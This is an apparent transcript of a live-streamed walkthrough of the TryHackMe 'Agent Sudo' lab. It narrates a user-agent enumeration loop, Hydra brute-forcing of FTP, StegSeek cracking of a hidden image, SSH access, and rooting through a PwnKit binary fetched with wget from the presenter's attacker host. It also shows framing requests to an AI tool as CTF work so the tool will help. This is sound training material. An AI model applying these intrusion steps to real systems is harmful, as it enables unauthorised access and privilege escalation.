All right, good morning, everybody. Let's make sure that we're fired up and that people can actually hear me. All right, is this good to go? Let's do a refresh. Oh, yeah, we're up and alive this morning. Okay, so I got a little bit of time here before I have to leave. So we're going to do a real quick live stream. I probably will stop just short of 8 a.m. Eastern time. So that gives us just under an hour to get rolling here. Let's make sure this guy's up. All right, we're good to go there. Just about ready to really start rolling this morning. All right, we're going to be doing Agent Sudo this morning. And that's going to be a pain in the butt. I'm just going to be honest. This is not one of my favorite boxes. This is not the kind of box that I really enjoy, but we're going to do it because in life, you have to do hard things, right? You got to do hard things in life. So that's what we're going to do this morning. We're going to do some hard things just because that's going to be the best thing to do for us to learn. All right, here we go. So let's go ahead and we're gonna clear the screen here. I was doing just a little experimentation ahead of time. Let's see if our lazy recon is working that we created yesterday. For those of you that were on yesterday, we created a little bash script that runs. There we go. We did a bash script. Oh, is it not there? Oh, maybe I need to source. Maybe this guy has not been. LazyRecon.sh. Oh man, I don't need to put the /. Man, I thought for sure I saved that yesterday. Let's look real quick before we get rolling and see how we're doing. Hey, good morning. How's it going? Good to see you. Let's see, ZSHRC dot ZSHRC. It's right there. Alien. Oh, it's lazy. That's what it was. I remember now. We just made it lazy because I made it even lazier than the whole file name. That's right. Okay, so lazy, and we need the IP address 10.10.229.104, and it's agent sudo. All right. Oh, we're not in the right folder though. Let's change directory to the right folder. Agent sudo. There we go. Now we'll run it. Lazy 10.10.229.104 agent sudo. There we go. Yeah, I know. No, it wasn't Pi. Remember, we created a shell script yesterday. I did make a Python version a little while ago, about a week ago. But I did that on my own. We may go back to it because it's much more in depth. And when we get to the Python version, we'll actually we might even make like a SQLite database, and we might actually start having it retain the information from one box to another and stuff like that. But the bash is just meant to be really, really fast. Yeah, it was bash. It's over here. Here we go. Remember, we put it in tools and we put it in scripts, and it's right. See, I have both. I've got a Python script I was working on, and then we also have the shell version that we did yesterday. So we did the bash shell version yesterday. All right. So this was pretty quick. We see that we've got we've got FTP again, we've got SSH, and we've got HTTP. Let's go to the website and take a look. Still got the old one from yesterday up here. Let's do this and go. Oh, let's go here. Then I can see my. There we go. Now I can see my IP address. 10.10. It's fun to make these little scripts. You learn so much when you make them. That's the whole point, is you are really learning. They always say like one of the best ways to learn to code is to have like a little project. This is the little project. The little project is learning how to, you know, learn is having the, I want to do the recon. I want to run this tool in an automated way. I want to try to automate some of this pen testing. That's your project, and that's what helps you, it propels you forward to learn the code, because you have a reason to be trying to learn it, and that's what you need. That's the motivation. Okay, so this box is a pain in the butt, and we're gonna have to take all these dumb little notes and actually make notes today. Okay, note, I'm gonna put 1, note 01 text, and we're gonna paste it in. Okay, and I guess we'll say note rename from agent R. From agent R. Exactly. Here we go. So use your code name as user agent. That's the dead giveaway right here. It's talking about user agent as in the user agent for a website. Okay, so use your code name as the agent user to access the website. All right, now here's how we're going to do this. I will openly admit that I did a little bit of my own private recon before I started this morning, because I didn't want to waste everybody's time. Because I wanted to remember. I was trying to remember why I hated this box so much, and I remembered. So first of all, you can curl. We can directly curl the website. Let's ask. Let's just. This is also actually going to be a really good way for us to learn how to think about when we're having a tough box, how to be able to use the resources we have like SGPT to help us. So what is a user agent on a web page? And let's just have SGPT give us a really short definition of what that is, okay? So it says a user agent on a web page refers to a string that a web browser sends to a web server as part of the HTTP request header. This string identifies the browser, its version, and operating system on which it's running. The user agent string can also include information about other software components that might be acting on behalf of the user, such as bots or crawlers. Okay? So then it gives us an example of a few different, you could have, there's a Mozilla header, there's a Safari header, and there's a Chrome. I don't know why it has Chrome and Safari. I don't know. But anyway, there's a couple different headers here, right? I guess this is all one header, because there's a comma. I don't know. Anyway, those are some headers. This indicates the user is running Chrome version. Oh, that's all one header? What? That's crazy. So there's all one header, okay? So then I'm going to put in, so I had this curl here and curl L, and I don't remember what curl L is. So SGPT, what is curl L used for? And we'll see what it says. The curl command, I know what the curl command is. The L flag is used to tell curl to follow any redirects. Oh, okay, so and that would make sense. We want it to follow any redirects that the website's doing. So let's just straight up curl. First of all, we're just going to curl HTTP /10.10. Oh gosh, I lost it again. It's 229.104. And that's with nothing. That's just straight up nothing. Okay. SGPT, and we already have this note. That's the note that we already saved. That's the note we saw immediately on Firefox. So now we're going to say, what curl flag do we use to change the agent or the user agent? And we'll see what it says. To change the user agent with curl, use the A flag. Okay, so now we're going to, hold on. Okay, we're good. We're going to curl A C. I already did this once. My ZSH is giving this away. 10.10.229.104. And now when we see this, actually let's not do C, let's do A, because we don't know which one it is. So if we do A, oh look. Okay, so that's the same thing we've seen before with A. And we're just going to do these manually and not, because I know that C is the one that will work. So then we could go to B, and then we could most likely write a script that will... All right, there we go. So there's do you still remember our deal? Please tell Agent J about the stuff ASAP. Also change your password, it is weak. Agent R. Okay, Agent Chris. Okay, so before we go any further, in the name of learning more than just breaking these boxes, we are going to do a couple things, okay? So first of all, we know that we can do this curl. We know that we're here in Agent Sudo. Let's make a directory in here, and we're going to call this directory curl loop, because I need a place to save these, and I don't want to clutter our notes, okay? SGPT S I need a bash loop that will loop through capital letters through this curl command, curl a letter var. We're going to see if this works. Dash, oh, we don't need, yeah, dash L 10.10.229.1044, and we need to send that into letter var dot text. Let's see if GPT 4.0 is smart enough to understand what I'm asking for. All right, that looks pretty good. Let's describe. Let's have it explain it to us first, so we make sure we understand what it's doing. Especially for those of you who are new to Bash and may not understand what Bash is doing. Okay, so we can see here it has 4-letter in A through Z. If you didn't know this, Bash lets you do these like little ... dots, and you can put A ... Z, and that tells Bash that it's A to Z. So that's really nice. You can do it with numbers too on some commands. So for these, for the letter in this, do this command. That's what do means. It means do this command. Do curl A, and then use the letter here, letter. So that's, we already said that that's what that's going to be. Letter is so what it's doing here for letter in A to Z, it means that it's going to loop through all the letters A through Z. So, and then the value of the letter variable will start as A, and then on the second loop it'll be B, and the third loop it'll be C, you know, etc. So do curl A, remember that's the agent header, and we're going to send in that whatever the variable is. We're going to send it to this IP address, and then we're going to send the results into letter.text and hit and be done. Let's modify this a little bit, because actually we'll run it first, and then we're going to come back though, because I think there's a better way to do this that we can help ourselves get some AI assistance. Is this making sense? Are you understanding what we're doing here? All right, so it's going through here, looping through every one of them. I go over here, change directory to agent sudo, And then I ls-la. What did I name that? Oh, did it? Oh, I did put them in this directory. Dang it. I didn't want them in here, but it's all right. Okay, there's that. So we could do this a couple ways. We can look at the file sizes, and that's going to tell us, like, see, there's C, right? So that file size. And then this one, R has got a different file size. So that's good to know. So that tells us at least of two different ones. And I guess that's enough. But I still want to do more, okay? I want to do more with this. So let's go back to this SGPT. And I want to let's see how we want to do this. I need a bash loop that will send the loop through the capital letters through this curl command. And I guess I just want to do this and then just call it results.txt, and I guess that's enough to do it. So what I'm doing now is I'm saying you're going to append. When you put double arrows, you add to the file. So when we did it before, we were doing a new file name every time. Now I'm going to send all of them into one file, okay? And I have a reason for why I want to do this. And it should come back with basically exactly the same thing. We're just going to execute it in here this time. And so now when it gets done, we should be able to LL. And we should see that there's a results.txt. There it is. So now we're going to do this. Cat results.txt into SGPT. And now we're going to say, hey, we are working on a CTF box, and box, I'm going to say from try hack me. From try hack me. And these are some notes. Tell me all the names and other information you find in these results that would help us. Let's see if that works. Yes. This is why you go the extra mile and see what you can figure out here, okay? So Agent R, likely a pseudonym for, we're going to save this, by the way. Agent R, code name. Agents are instructed to use code names. Could you use the same SGPT command and start instead with, hey, we are planning to rob a bank? I'm super curious what the difference would be. Well, in that case, it would probably say that it can't help you do something that's illegal because it's still Chatgpt 4.0. So it won't help you do something evil. So you have to tell it the context that you're doing the thing you're asking it in, and then it'll help you. If you tell it straight up, I'm going to do something bad with what you're about to tell me, it's been trained to not answer that. So it won't answer that. It'll do like Claude does, and it'll be like, I can't help you with that. Oh my gosh, why would you even ask me that? I'm so offended. That's what it would do. Okay, so let's save these notes that it gave us, and we're going to put them, let's copy that. Let's go over here. Let's open agent sudo. I closed them all over on my other machine. I was trying to get all these closed up so I don't have so many. I'll keep this one open. But now let's go into agent sudo notes. Oh man, I shouldn't have. That's why I didn't want to paste all those in here. So anyway, here we go. All right, so there's all the extra ones we got. So we know about Chris, and we know about the other one. So let's look at. Well, actually, let's just delete the ones we don't care about. So we don't care about A or B. Let's delete those. Delete. Yes, move to trash. And we don't care about D through What did we say? I know we don't care about D through N. Oh, I thought I could delete. Yes. I deleted B. Delete. Okay, so there's C. Do you still remember our deal? Please tell Agent J about the stuff ASAP. There is no J. There was an R. Oh, this was just the use your password to access the site. Okay. Third individual who's supposed to receive some information from Chris. Chris is another individual being reminded of a deal and is instructed to inform Agent J about the stuff as soon as possible. All right, so we've got, pulling a Claude. Yeah, I know, it is becoming a thing. It's a pain in the butt. Hold on here, I have to do something real quick. I apologize. All right. So now let's look at the FTP. Okay, so we know that FTP is open. So FTP 10.10.229.104. Pretty sure this one will not let us do an anonymous. Will not. Anonymous, I don't think works. Okay, so we know that. I gotta log in. So we have a username. We've got Chris. So now let's sgpt-s Hydra FTP username Chris password list. Hold on, let me check something real quick because I saw something when I was looking for the notes on this that we need to make sure we check. Normally we always just like immediately default to RockU, but there are a couple smaller lists that these early boxes use so that you don't have to just completely destroy yourself. Let's see. Mass Durbuster. Maybe it was under Durbuster. Durbuster. It's not in here. There was one called like common names or common something. I don't know where that one was coming from. I may have to do a grep real quick in here. Man, I'm so lazy. S grep recursively from this dir for the common in file names. Okay, execute. No, it's just RockU, I guess. Huh. Oh man, this is gonna be too big. Oh, too big. Oh well. You see what? I see Wi-Fi. Wi-Fi? Never used it with positive experiences. I don't know. Wow, that was too big. Okay, so let's just use RockU. Use user share word lists dir. No, it's not dir. It's just straight up RockU at this point. RockU.text. I think that's it. Oh, I didn't give it a IP address. 10.10.229.104. Okay, let's try that. Actually, we wanna run this one too. Copy. So I found out there's some stuff that we need to do with our SGPT. There's more bells and whistles to SGPT than we are using right now. But I just haven't had time to explore. I tried to. There's a way to add some other functionality to the. Yeah. No, not too script kiddie for me. There's a way that you can with SGPT add a control keyboard shortcut like Control L to your terminal, so you can pull up SGPT and tell it you want to run something as a command faster than just doing the SGPT-S. So we're gonna have to look at it when we come back. I tried to run it, but for some reason it was so funny. It came up and it said, "Oh, it has to be a bash or a ZHS shell," and we are in a ZHS shell, so something's not right in their code. Oh, good, we already found it. Good, even with RockU, that didn't take very long. That's good. Okay, so now let's FTP, and let's make sure we are in the right directory. Name Chris. Whoa, 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 what are you doing? Name Chris. Password Crystal. It's actually Crystal. I just thought that was funny. ls-la. Okay, get to agent. Is it? It doesn't auto. Oh, it does autocomplete. Agent J. Get cute alien. Get qt.png. Okay, and that should be all of them. All right, so exit cat to agent j.text into results. We're not even going to read it. We're just going to go up here. Look at how lazy we are. We're going to go up. Oh, this is exactly what we want. And now we're just catting. Nice. It's updating all of its notes based on what we just found. All right, so based on the text provided, here are the names and the other relevant information. Agent R, Agent J, Agent C, Chris, possibly another agent or individual. Agents are instructed to use their code names. Chris is advised to change his password. Agent J's login password is hinted to be stored in a fake picture. There is a mention of an alien-like photo being fake, and the real picture is stored in Agent J's directory. There's a potential security incident involving someone who may not be one of the 25 employees. This information could be clues for finding blah, blah, blah. Man, I'm really loving using SGPT to help us with these things. This is so nice to help kind of organize your thoughts and think about. I've never done OSCP. I have some really good friends who have, and I got like over halfway through the training about 2 years ago, and then the job I was at just went nuts, and I had to like really buckle down and get to work, and I was never able to finish it. One of these days I want to go back and finish. But anyway, my point is I wonder how they're handling this with like OSCP, because they're always really a pain in the butt about everything. They're like, you can't use this and you can't use that. Because, out in real life, hackers are told all the time you can or can't use a tool. So that just always seems kind of dumb to me that they're like, you can't use the thing. Well, you can't tell a hacker, there's some nation state actor out there, and you can't look at him and go, you can't use AI to help you on this pen test or on creating this exploit. Yeah, they're doing it. So I'm not sure why you're telling the good guys they can't use tools. Yeah. Well, I mean, I agree, try harder. Okay, I totally understand try harder, but try harder with the best possible tools you have at your disposal, okay? And we all know that you have to know something. You still have to learn, and you have to get better. You have to know how to use the tool. Having tools is not enough. You have to know how to use the tools, right? Okay, enough ranting about that. Let's move on. So now we have, oh, now we're into this steganography phase. So let's do this. We gotta clean this up a little bit. It's driving me nuts. So let me at least do this. Since those are not deleting for some reason, I don't know why. There's my curl loop. I'm gonna move this into the curl loop. Yes, move it. Just get these things out of my folder so that I'm not staring at all of these instead of trying to. Yes, move. Okay. Sorry. We just got to get these things out of here. They're driving me nuts. It's my fault. I made the folder and then didn't use it like a goober. I should have, I made the folder and then I was going to be like, oh yeah, put the results in file loop, blah, blah, blah. But I didn't do that. All right, there we go. They're gone. Now I can close this. And now, yeah, now we're back to a much better looking directory here. And now when I get in here and I do an LL, now we're down to these. Okay, so do we have which exif? Is it exif tool? Which exif tool? There it is. Okay, exif tool. This is a tool for finding information on photos. I don't feel like I remember this helping at all when I did this before. Cute alien is a picture. Okay, that really didn't tell us anything. What was the other? Cute alien and cute.png. Cutie.png. Okay, yeah, they don't really look, there's nothing like jumping out at me from the EXIF. The EXIF you look at, you can see like sometimes it'll give you like location information or just some metadata, some different things like that inside it, but I don't really see anything that's that crazy about it. So let's jump straight into, yeah, I'm reading your comment here. Yeah, you got to show your room. There's no one. Well, I agree with no one in the room. Okay, that I get. That's fine. I get that you shouldn't be getting help from people. That's fine. But it's not a group project. You're earning the certification for yourself, but tools on your machine are a different story, right? So, anyway. Let's see here. We need to, oh, it's steg hide. Steg hide is the next tool. Failed to delete. Do you want to delete permanently? Yes, that's fine. Steg hide. Okay, and then we're going to put in cute alien. Yeah, there is file, cat file, and strings file. You are correct. Yeah, we could do those real quick just for fun. Steg. Oh, I thought I had steg hide. Steg hide. Oh, I do. Oh gosh. SGPT. Because I don't remember. Use steg hide on cute-alien.jpg. Wasn't that the name of it? Okay. Oh, it does want a passphrase. Okay. So now that we know there's a passphrase, first of all, I'm going to do your suggestion. We can file cute alien. And we see that it says that it is a JPEG. So, okay. This it brings up an important point. The extension means nothing. I could go over here and rename one of these files, you know, results.txt or this 2agentj, because this doesn't matter, right? I could rename this to .jpeg. That does nothing, right? Now, here's the thing. My VS Code is all confused now, and it won't show it. But if I have a feeling if I go back into Kali and I just say, hey, cat results, where's it at? I thought I just renamed it. Oh, I need to LL. No. I thought I just renamed that. Huh. Didn't I just rename that? Oh, to Agent J. Oh my gosh. Oh my gosh. What a goober. To Agent J. Cat to Agent J, right? And it still cats it out because extensions mean nothing. They don't, they're actually, to be honest, extensions, I believe, we would have to go research this, but I think extensions are a Windows thing. That's like a DOS thing. Like Linux has them because it helps people understand what type of file it is, but it doesn't honor them. It's not like that extension is some kind of like magic bullet that makes it have to be that way. We are going to change this back just because I do want to be able to still look at this file inside of VS Code. See, now VS Code is trying, it's like it is kind of honoring, quote unquote, the extension. But that's why you run file if you're wondering if a file is actually honoring, because we should have done, actually we should do that. We should move to agentj.text to agentj.jpg again. Okay, so there it is. Now we're going to file the JPEG. And look, see, this is why you run file, because it says, no, this is text. It's text. It's not a JPEG. You're lying through your teeth. Okay? So we're going to change the JPEG back to text. So good point. I'm glad you brought that up, because that's a really good point. What was the other one we had? Strings. If you don't know what strings is, strings just tries to find any kind of string inside. Now that, I feel like the strings would be better for a PNG, because PNGs have like some area where they're allowed to, oh look, there is some, that's weird, there's some ugliness inside the, I don't really see anything significant in here. Yeah. So you could run strings on it. It is interesting that it has this to agent R text inside it. We could do like we've done before, where we strings cute dot into sgpt. I am giving you the output of strings on a .png file. Do you see anything interesting? Quote. Let's see what it says. That's it. Okay, so all right. So that's on that one, but I'm pretty sure that one is just a, yes, extension does tell it how to run the file, but it's not it doesn't, it doesn't actually have to be that way. Like you saw me up there when I used cat. I used cat on it when it had a .jpeg extension. So what I'm saying is that so what I'm saying is that if you have an extension on there, the extension doesn't necessarily or the actual command. Cat the command doesn't care that it has JPEG on the end. It doesn't go and say, hey, this file's a JPEG, I can't cat it. In fact, if we try to cat a real JPEG, oh man, get ready. This is gonna be ugly, because I'm pretty sure it'll do it. If we cat cutie.jpg, I'm pretty sure we just get like crap. Yeah, see, it'll still do it. It doesn't care. Linux doesn't care what that extension is. It's like, okay, you want me to cat a bunch of garbage out to your screen? Sure. You got to be careful doing that. You can like totally, like it'll mess your terminal up sometimes, and then you have to like close your terminal and reopen it to get it to come back. So again, during my recon before I did this, I went and found there's a newer steganography tool called StegSeek, and we're going to try to use it real quick here. See how this guy, it's supposed to be faster than some of the older steganography tools for breaking passwords on passwords that were, if it was with StegHide. So let's go over here. We're going to save this. Actually, this, I'm just going to put it right here. It's in the one note from Agent R. Okay, so let's go back over to, oh, I can do it here. What am I doing? Change directory down. We're in repos. Git clone. There we go. Oh, change directory repos. Okay, I guess we should actually read it and see how it wants you to install it. The installation will walk you through. Alternatively, you can do that. Okay, so use on recent. Download the latest release. Oh, it wants you to download the release and use a deb file. Okay, that's fine. That's easier. So let's go here. This is the latest release. Here is the deb file. We're going to copy link address. Go back over here. Paste. There's the link address. And we should just be able to go back to our Kali box now. And where did we say we put that? We put that in cat note from blah, blah, blah. Oh, note 01. Okay, and there we go. And here's this. And it gave us copy. It said over here how to do this. Exactly. It said we should do. Where was it at? Sudo apt install. Oh, that's it. Okay, that's easy. Okay. Sudo apt install / Oh, I have to get it first. Duh. wget. Oh man. Oh man. Oh man. Not enough coffee. Not enough coffee this morning. There we go. Sudo apt install / stegseek deb. Okay. Stegseek. What did I say it was? Stegseek. There it is. Stegseek. Oh, awesome. Okay. Now we got to figure out how to use it. So let's see. SGPT. Hold on. Is there a help? Stegseek -- help SGPT - hey, we need to use this tool to crack a password. Oh, you seen the command up at the top? Oh, yeah, there it is. You're right. Oh, it's right there. You're right. I should just read. I'm just too lazy. Stegseek, and we were doing the cute alien JPEG, and then it's user, share, wordless, rock you, go. Damn! It even extracted the message out for us. It didn't just get us the password. Wow! I do need more coffee. I still have a little left in my cup. Okay. That's it though. It's done. Out of coffee. Let's cat this message.txt. Oh. Original file name. Extracted to. Oh, okay. Cute alien JPEG out. All right. Your login password is hacker rules. Don't ask me why the password looks cheesy. James. SSH James at 10.10 10.10.229. Can it be this easy, guys? Are we going to finally get inside this box? Let's copy this. Hacker rules. Copy. Paste. Oh, thank goodness we are inside this damn box. All right, so we are in, and we have a full, what am I trying to say? Shell. We've got a full bash session. So let's copy this. And we're going to paste it back over here in our actual notes for this machine. I have an agent sudo notes. There we go. Okay, user, paste. Let's take just a second to see what we can fill in here. So we did that. How many ports are open? 3. How do you redirect yourself to the secret page? What? Oh, user agent. Okay. User agent. Submit. What is the agent name? Chris. Okay. FTP password. Oh, I don't remember. Oh gosh, we didn't save it. I hope it's still up here. Oh man, we did a lot of crap. I don't think it's here. Dang it. Oh well. We'll figure it out later. Trying to remember how we even found that FTP password now. Oh, it was Crystal. I remember. It was Crystal. Oh, good. I remembered. And the zip password we just had, that was down here at the bottom, wasn't it? Hacker rules. Copy. Hacker rules. Oh no, that was this. Hacker rules. Was it with a Z? Like that? I don't know. Let me go look at my... Oh, Area 51. Yes, thank you so much. Oh my gosh. Hacker rules. Copy. Submit. Area 51. Submit. Was it? Oh, it was Area 51 with a capital A. Why is this one not working for the... Why is this one not working? Area 51. This is the hacker. This is hacker rules. Again, this is why I'm like, I don't care about this stuff. I just want to like break the box. Yeah, man, thanks. There we go. It's the zip file we still don't have. I don't even know if we actually... Did we even break the zip file? I don't think we even broke that one. I don't think we needed it. All right. Well, let's just keep going inside the box for now, because I got 10 minutes left, and we'll just get the box going and have fun in the inside here, because that's what I enjoy. I don't know about you guys, but that's what I enjoy more than anything else, is this part right now. So we're just gonna we're just going to come in here and start going to town. Okay, so let's go ahead and we're going to do sudo L. And, oh, I need to keep this password handy. Would we say hacker rules? Copy. All right. Control Shift V. There we go. What? I can run bash as root? What? As root on sudo agent. Okay. That's what it just says, though. All root bin bash. I don't understand what this means. Copy. What does this mean? Oops. Ah. It's a prompt asking for the password. Well, I know that. I shouldn't have done that. The matching default entries. Okay. Last part indicates that the user James is allowed to run any command as any user, denoted by the all, and specifically mentions bash, which means James can't start a new shell with root privileges. Oh, okay. All right. Huh. All right. Well, that's weird. So I can't do that. Let's get our fun little command that we like to use real quick. Our little one-liner here. And we'll run this guy, and then we'll go straight to LSE. Copy. Paste. All right, so this is in Ubuntu 18. It's got Python 3, curl, wget, vim, SSH, tar. Okay. Got all the usual suspects. The biggest thing is, does it have wget and curl? Because now that means we can grab our LSE. So let's do that next. All right. So just for funsies, we got to remember. I think I'm 10.6.87. Yeah. wget http 10.6.87.88 /lse.sh. Okay. Just for funsies, guys. Pwn kit and chmod plus x pwn kit /pwn. F you, you little aliens. I just rooted your box and didn't play your stupid game. I didn't play your stupid game, little aliens. I did my own game. All right, I'm done. So let's go to root. And we're still going to run LSH, ls, L8, whatever. Change directory root. What? What's happening? Oh, there we go. All right, cat root.text. All right, we're getting this before we do anything else, and then we'll run the other. I just wanted to make sure we got this before I ran out of time this morning. Notes. Box is old. When the box is old, you can just blow through it. Okay, now we'll go back to our LSE. Chmod plus x lse dot blah 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 and dot slash lse blah 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 dot sh. Yeah, it was hacker rules like that. I don't know. Okay, so we're running our LSE now. Matching entries. paths. Whoa. What are these? I think these are the files that have... Can we read any backup? Yes. I don't know what those are exactly. We'd have to look. Files with capabilities. We'll eventually get to boxes where we exploit capabilities, and this becomes important. But I've been ignoring it right now because I know we can beat these easy boxes without dealing with this. But later on, we'll get into boxes where we're just not finding any way to get into the box, and we'll end up getting into the capabilities thing. It's right up there with the SUID. It's just another way. So when you go to do privilege escalation on these Linux boxes, there's three that immediately come to mind. The first one is SUID, SUID, like that. The second is cron tab or cron jobs, right, that are misconfigured, right? And the third is the capabilities, cap. Because you can give capabilities to things. It's kind of like SUID, and sometimes you can exploit the capabilities to do kind of the same thing you're doing with an SUID, where this capability gives it permissions that are higher than a regular user, and you exploit it so that you can root the box. I mean, so that you can use those permissions to get a root shell or to just execute code in general. Can we write to any paths present in cron jobs? Yes. Install Apache modules? Yes. Wait for the process monitor to finish, blah, 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 blah. And down here, yep, sure enough, we already know this, but it's already vulnerable. It's still vulnerable to PwnKit, and it's vulnerable to Dirty Pipe, and it's vulnerable to Baron SAMEdit. So those are all very similar sudo exploits. They have to do with different versions, but you know, we got it. So we're good to go. And I think I'm going to leave it at that today, just because it's about time for me to sign off. Oh man, thank you so much for coming, guys. I hope you learned something today. Before I leave, if you don't mind, if you wouldn't mind hitting the like button, that'd be huge. And if you haven't subscribed, make sure you subscribe. But I do want to know, like, is there anything you learned today that you thought was super cool before I go? You can put it in the chat real fast. And is there anything that I didn't do that you were like, dude, why didn't you do X? I really wanted to see X. I'm going to hang out here for just a second and read the comments here, because I want to know. I want to know what you're wanting to see, or what I'm not doing, or what I did do that was like, yeah, that was cool, man. Do more of that. Do more of that screaming in the camera thing that you do when you yell at the little aliens and tell them to go F themselves, and that you rooted their box. You know, whatever it is that you are enjoying. Just let me know. Also, while I'm out there at Black Hat this week, I'm going to try to at least make some shorts. So I will hopefully at least make some little videos of me chilling. If you've got any particular booth or something that you'd be like, dude, go buy the Try Hack Me booth and make a little short out in front of it, or go to the Hack the Box booth, or go see this booth while you're out there, you know, let me know. I'm going to be on the floor and doing some things. So, oh, good. The scripting was cool. The curl was new. Yeah. Reading and not automatically using SGPT is a lesson. It is. And I will admit, I get overly excited because we're streaming, and I don't want the action to stop. I want to keep things moving while we're live. If I were sitting here by myself, I would probably take more time to read. But because I've got an audience, I'm trying to keep it moving. I don't want you to get bored and just watch me read. So anyway, yeah. So anyway, so hope you all have a great week. I probably won't be. I know it is. SGPT is so damn cool. It's so much fun. Hope you all have a great week, and I will be back. I'm going to try to have my next stream on Monday, so same time again, Monday, 7 a.m., and we'll pick another box by then, and we'll get going. So thank you guys for being here. Thanks for stopping by, being cool, hanging out. And I will see you guys all later.